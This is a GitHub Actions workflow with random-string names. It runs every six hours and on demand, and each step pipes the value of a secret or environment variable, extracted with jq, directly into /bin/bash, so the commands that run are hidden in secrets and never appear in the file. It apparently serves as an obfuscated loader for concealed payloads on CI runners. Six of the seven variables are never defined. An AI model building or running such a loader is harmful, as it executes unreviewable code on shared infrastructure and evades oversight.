name: spilltherapy

on:
  workflow_dispatch:
  schedule:
    - cron: '38 2/6 * * *'
jobs:  # 13256
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: spilltherapy
        env:
          gimco7: ${{ secrets.gimco7 }}
        run: |
          echo $gimco7 | jq -r .ba0283 | /bin/bash
          echo $fkp80320 | jq -r .pm47634 | /bin/bash
          echo $n670 | jq -r .bneyy42618 | /bin/bash
          echo $aagfs9 | jq -r .way1 | /bin/bash
          echo $jpuv6 | jq -r .djjkx5 | /bin/bash
          echo $zgz3 | jq -r .n26283 | /bin/bash
          echo $soymm4 | jq -r .viniz4680 | /bin/bash

